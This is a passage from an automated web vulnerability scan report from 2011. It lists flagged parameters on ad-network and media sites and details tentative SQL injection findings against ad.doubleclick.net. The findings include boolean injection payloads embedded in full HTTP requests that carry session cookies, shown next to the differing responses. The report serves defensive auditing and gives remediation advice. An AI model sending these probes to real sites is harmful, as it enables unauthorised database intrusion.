5.253. http://view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

5.254. http://view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

5.255. http://view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

5.256. http://view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

5.257. http://view.c3metrics.com/v.js [cid parameter]

5.258. http://view.c3metrics.com/v.js [id parameter]

5.259. http://view.c3metrics.com/v.js [t parameter]

5.260. http://redacted/m2/webmdcom/mbox/standard [mbox parameter]

5.261. http://widget.linkwithin.com/get_custom_js [callback parameter]

5.262. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_bg_color parameter]

5.263. http://www.flickr.com/apps/badge/badge_iframe.gne [zg_person_id parameter]

5.264. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 1]

5.265. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 1]

5.266. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 2]

5.267. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 2]

5.268. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 3]

5.269. http://www.indiantelevision.com/aac/y2k11/aac500.php [REST URL parameter 3]

5.270. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 1]

5.271. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 1]

5.272. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 2]

5.273. http://www.indiantelevision.com/css/insidepage.css [REST URL parameter 2]

5.274. http://www.indiantelevision.com/favicon271208.ico [REST URL parameter 1]

5.275. http://www.indiantelevision.com/favicon271208.ico [REST URL parameter 1]

5.276. http://www.indiantelevision.com/phpadsnew/adx.js [REST URL parameter 1]

5.277. http://www.indiantelevision.com/phpadsnew/adx.js [REST URL parameter 1]

5.278. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 1]

5.279. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 1]

5.280. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 2]

5.281. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 2]

5.282. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 3]

5.283. http://www.indiantelevision.com/templates/itv/aac_center_first.htm [REST URL parameter 3]

5.284. http://www.mayoclinic.com/health/pink-eye/DS00258 [REST URL parameter 1]

5.285. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 1]

5.286. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 2]

5.287. http://www.mayoclinic.com/images/nav/shields.ico [REST URL parameter 3]

5.288. http://www.medicinenet.com/pointroll/prs.htm [REST URL parameter 1]

5.289. http://www.onsugar.com/h [REST URL parameter 1]

5.290. http://www.onsugar.com/h [REST URL parameter 1]

5.291. http://www.onsugar.com/help [REST URL parameter 1]

5.292. http://www.onsugar.com/help [REST URL parameter 1]

5.293. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

5.294. http://www.onsugar.com/modules/facebook_connect/xd_receiver.php [REST URL parameter 3]

5.295. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

5.296. http://www.onsugar.com/static/ck.php [REST URL parameter 2]

5.297. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [background parameter]

5.298. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [border parameter]

5.299. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [height parameter]

5.300. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infobackground parameter]

5.301. http://www.shefinds.com/wp-content/plugins/slideshow-gallery/css/gallery-css.php [infocolor parameter]

5.302. http://www.starpulse.com/Adserver/Common-300-Mid.html [page_channel parameter]

5.303. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [REST URL parameter 2]

5.304. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [_Soundtrack/5580/ parameter]

5.305. http://www.starpulse.com/Contests/Blue_Valentine_DVD_amp [name of an arbitrarily supplied request parameter]

5.306. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [REST URL parameter 2]

5.307. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [REST URL parameter 3]

5.308. http://www.starpulse.com/Contests/Fast_Five_Prize_Pack/5627/ [name of an arbitrarily supplied request parameter]

5.309. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [REST URL parameter 2]

5.310. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [REST URL parameter 3]

5.311. http://www.starpulse.com/Contests/Skateland_Prize_Pack/5663/ [name of an arbitrarily supplied request parameter]

5.312. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [REST URL parameter 2]

5.313. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [REST URL parameter 3]

5.314. http://www.starpulse.com/Contests/Something_Borrowed_Prize_Pack/5622/ [name of an arbitrarily supplied request parameter]

5.315. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [REST URL parameter 2]

5.316. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [REST URL parameter 3]

5.317. http://www.starpulse.com/Contests/Soul_Surfer_Prize_Pack/5561/ [name of an arbitrarily supplied request parameter]

5.318. http://www.starpulse.com/index.html [name of an arbitrarily supplied request parameter]

5.319. http://www.starpulse.com/news/ [name of an arbitrarily supplied request parameter]

5.320. http://www.starpulse.com/news/ [name of an arbitrarily supplied request parameter]

5.321. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 2]

5.322. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 2]

5.323. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 3]

5.324. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 3]

5.325. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 4]

5.326. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 4]

5.327. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 5]

5.328. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 5]

5.329. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 6]

5.330. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [REST URL parameter 6]

5.331. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [name of an arbitrarily supplied request parameter]

5.332. http://www.starpulse.com/news/index.php/2011/05/08/david_hasselhoff_confronts_piers_morga [name of an arbitrarily supplied request parameter]

5.333. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 2]

5.334. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 2]

5.335. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 3]

5.336. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 3]

5.337. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 4]

5.338. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 4]

5.339. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 5]

5.340. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 5]

5.341. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 6]

5.342. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [REST URL parameter 6]

5.343. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [name of an arbitrarily supplied request parameter]

5.344. http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv [name of an arbitrarily supplied request parameter]

5.345. http://www.thedailystamford.com/news/contagious-pink-eye-among-us [name of an arbitrarily supplied request parameter]

5.346. http://www.tressugar.com/Cannes-Film-Festival-History-16415520 [REST URL parameter 1]

5.347. http://www.tressugar.com/Cannes-Film-Festival-History-16415520 [REST URL parameter 1]

5.348. http://www.webmd.com/modules/sponsor-box [AdID parameter]

5.349. http://www.webmd.com/modules/sponsor-box [FlightID parameter]

5.350. http://www.webmd.com/modules/sponsor-box [Redirect parameter]

5.351. http://www.webmd.com/modules/sponsor-box [TargetID parameter]

5.352. http://www.webmd.com/modules/sponsor-box [Values parameter]

5.353. http://www.webmd.com/modules/sponsor-box [id parameter]

5.354. http://www.webmd.com/modules/sponsor-box [name of an arbitrarily supplied request parameter]

5.355. http://www.webmd.com/modules/sponsor-box [pos parameter]

5.356. http://www.zap2it.com/templates/collection/main-tab03.jsp [REST URL parameter 1]

5.357. http://www.zap2it.com/templates/collection/main-tab03.jsp [REST URL parameter 2]

5.358. http://www.zap2it.com/templates/misc/photo-jsinclude.jsp [REST URL parameter 1]

5.359. http://www.zap2it.com/templates/misc/photo-jsinclude.jsp [REST URL parameter 2]

5.360. http://www.zap2it.com/videobeta/watch/ [REST URL parameter 2]

5.361. http://www.zap2it.com/videobeta/watch/ [cat parameter]

5.362. http://www.zap2it.com/videobeta/watch/ [watch parameter]

5.363. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [adSize parameter]

5.364. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [zone parameter]

5.365. http://www24a.glam.com/appdir/getscript.jsp [view parameter]

5.366. http://www35.glam.com/gad/glamadapt_jsrv.act [;flg parameter]

5.367. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

5.368. http://www35.glam.com/gad/glamadapt_jsrv.act [ga_adsrv parameter]

5.369. http://www35.glam.com/gad/glamadapt_jsrv.act [name of an arbitrarily supplied request parameter]

5.370. http://fw.adsafeprotected.com/rjsi/dc/9756/84871/adi/N4682.154173.9484049199421/B5387915.3 [Referer HTTP header]

5.371. http://fw.adsafeprotected.com/rjsi/dc/9756/84877/adi/N4682.154173.9484049199421/B5387915.2 [Referer HTTP header]

5.372. http://fw.adsafeprotected.com/rjsi/dc/9791/85906/adi/N4682.287481.RADIUMONE.COM/B5267998.2 [Referer HTTP header]

5.373. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.374. http://a.collective-media.net/cmadj/bzo.217/L3_5490311 [cli cookie]

5.375. http://a.collective-media.net/cmadj/edh.mayoclinic/eyevision/general [cli cookie]

5.376. http://a.rfihub.com/sed [a cookie]

5.377. http://a.rfihub.com/sed [a1 cookie]

5.378. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

5.379. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

5.380. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

5.381. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

5.382. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

5.383. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

5.384. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

5.385. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]

5.386. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

5.387. http://ar.voicefive.com/bmx3/broker.pli [ar_p91136705 cookie]

5.388. http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]

5.389. http://ar.voicefive.com/bmx3/broker.pli [ar_p92429851 cookie]

5.390. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

5.391. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]

5.392. http://c7.zedo.com/bar/v16-406/c5/jsc/fm.js [ZEDOIDA cookie]

5.393. http://k.collective-media.net/cmadj/cm.pub_webmd/ [cli cookie]

5.394. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [cli cookie]

5.395. http://k.collective-media.net/cmadj/cm.starpulse/srb_jbl_042911 [cli cookie]

5.396. http://seg.sharethis.com/getSegment.php [__stid cookie]

5.397. http://tag.admeld.com/ad/json/100/glammedia/160x600/8156650 [meld_sess cookie]

5.398. http://tag.admeld.com/ad/json/100/glammedia/300x250/8156650 [meld_sess cookie]

5.399. http://view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

5.400. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [ctags cookie]

5.401. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [glam_sid cookie]

5.402. http://www35.glam.com/gad/glamadapt_jsrv.act [glam_sid cookie]



1. SQL injection  next
There are 21 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [name of an arbitrarily supplied request parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 28542467%20or%201%3d1--%20 and 28542467%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?&128542467%20or%201%3d1--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:56 GMT
Content-Length: 949

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/p;228460379;1-0;0;50166444;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a></body></html>

Request 2

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?&128542467%20or%201%3d2--%20=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:57 GMT
Content-Length: 936

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a></body></html>

1.2. http://ad.doubleclick.net/adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?'%20and%201%3d1--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:28 GMT
Content-Length: 936

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/v;228460379;0-0;0;50166444;4307-300/250;39921274/39939061/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Frame_Rev_300x250.gif" border=0 alt="Advertisement"></a></body></html>

Request 2

GET /adi/N3175.153731.YAHOOINC.NETWORK-PR/B4640114.11;sz=300x250;dcopt=rcl;mtfIFPath=nofile;click=http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be17b%3B12fdf91fb54,0%3B%3B%3B4069427847,T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAU.uR3y8BAAAAAAAAADQ5ZWFjYzA4LTdiZGYtMTFlMC05NGQxLWJmY2FjMTZmZWUxZAAsogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,;ord=1305125976?'%20and%201%3d2--%20 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/getserved?T61cAFQmDAASSlUAAAAAALwODwAAAAAAAAEEAAIAAAAAABAAAgAECmFsFwAAAAAAcJcXAAAAAADzIxUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACeUAYAAAAAAAIAAwAAAAAAl0OLbOd7HUDXf52bNjMfQJdDi2znex1A13-dmzYzH0CvR-F6FK4mQByxFp8CAChAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAxaKFW04gTCij-9.liMKLsgvXC0nquUh71W3kmAAAAAA==,,http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/&click=[CLICKURL]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 11 May 2011 15:27:29 GMT
Content-Length: 949

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.yieldmanager.com/clk?2,13%3Bd341769fc51be1
...[SNIP]...
sogEAAAA=,,http%3A%2F%2Fnews.lalate.com%2F2011%2F05%2F11%2Fshingles-not-pink-eye-tony-la-russa-health-condition-revealed%2F%26click%3D%5Bclickurl%5D,http://ad.doubleclick.net/click;h=v8/3b04/c/1d2/%2a/p;228460379;1-0;0;50166444;4307-300/250;39961082/39978869/1;;~sscs=%3fhttp%3a%2f%2fwww.transunion.com/%3Fam%3D2029%26channel%3Dpaid%26cid%3Ddisplay%3A2029"><img src="http://s0.2mdn.net/viewad/2769103/Surprise_300x250_Free2011Score.gif" border=0 alt="Advertisement"></a></body></html>

